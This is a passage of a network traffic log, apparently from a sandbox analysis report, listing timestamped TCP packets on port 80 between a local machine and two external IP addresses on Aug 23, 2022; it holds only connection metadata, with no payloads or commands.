Aug 23, 2022 18:24:04.244024038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244041920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244138002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244216919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244277954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244286060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244333982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244539022 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244554043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244604111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244609118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244647026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244728088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244755030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244772911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244776011 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244780064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244806051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244822025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244829893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244873047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.244909048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244915962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.244918108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245007992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245034933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245104074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245106936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245110035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245249987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245434999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245502949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245610952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245629072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245745897 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245771885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245800972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245805025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245816946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245841980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245867968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245874882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245877028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245893002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245935917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245939016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245942116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.245954037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.245979071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246043921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.246063948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246145964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246170998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246193886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246203899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.246239901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246253967 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.246380091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.246584892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246613979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246697903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.246700048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246892929 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.246932983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246958971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.246984005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247008085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247049093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247059107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247071981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247127056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247189999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247214079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247230053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247237921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247287989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247325897 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247385979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247412920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247445107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247448921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247459888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247486115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247510910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247523069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247526884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247529030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247536898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247561932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247582912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247586012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247586012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247627020 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247642040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247668982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247678995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247694016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247701883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247718096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247729063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247745037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247754097 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247771025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247780085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247795105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247805119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247807980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247818947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247839928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247844934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247873068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247885942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247895956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.247910023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247936010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.247997999 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248001099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248011112 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248038054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248061895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248085976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248104095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248110056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248130083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248135090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248158932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248178959 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248265982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248269081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248378992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.248436928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.248502970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248761892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248794079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248833895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248842001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.248883963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.248893976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248922110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248939991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248964071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.248970985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.248987913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249025106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249058008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249088049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249147892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249171972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249175072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249206066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249243021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249340057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249365091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249399900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249419928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249598980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249638081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249661922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249670029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249701977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249718904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249738932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249766111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249790907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249814034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249818087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249836922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249860048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249880075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.249897003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249918938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.249963999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.252530098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.252631903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.261315107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261343956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261367083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261384010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261404037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261425972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261450052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261465073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261487961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261502028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.261535883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.261542082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.261703014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283202887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283243895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283268929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283375025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283392906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283400059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283416986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283417940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283436060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283454895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283480883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283489943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283499956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283528090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283548117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283550978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283622980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283627033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283665895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283682108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283685923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283704996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283715010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283723116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283746958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283750057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283754110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283766985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283772945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283786058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283787966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283807993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283866882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283874989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283890009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283907890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.283946991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283952951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.283977032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284148932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284224033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284265041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284286976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284307957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284322023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284337997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284358978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284382105 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284415960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284445047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284457922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284459114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284491062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284504890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284513950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284538984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284550905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284579039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284584045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284590960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284631968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.284651995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284739971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.284787893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293426991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293467999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293498993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293505907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293528080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293529034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293538094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293555975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293566942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293584108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293605089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293629885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293632030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293659925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293685913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293693066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293699026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293701887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.293706894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.293723106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.294068098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.294461012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.294493914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.294553041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295223951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295253992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295279980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295306921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295334101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295342922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295372009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295382023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295386076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295439959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295469046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295495987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295506001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295519114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295523882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295552969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295553923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295562983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295581102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295594931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295610905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295622110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295639992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295651913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295670033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295698881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295710087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295727015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295734882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295757055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295772076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295789003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295797110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295819044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.295828104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.295856953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.317465067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317528963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317547083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317564964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317584991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317600965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317642927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317662001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317665100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.317678928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317696095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317718983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.317753077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.317770958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317789078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.317843914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.317878008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.318111897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.318133116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.318150997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.318167925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.318207979 CEST	49827	80	192.168.2.3	45.95.11.158
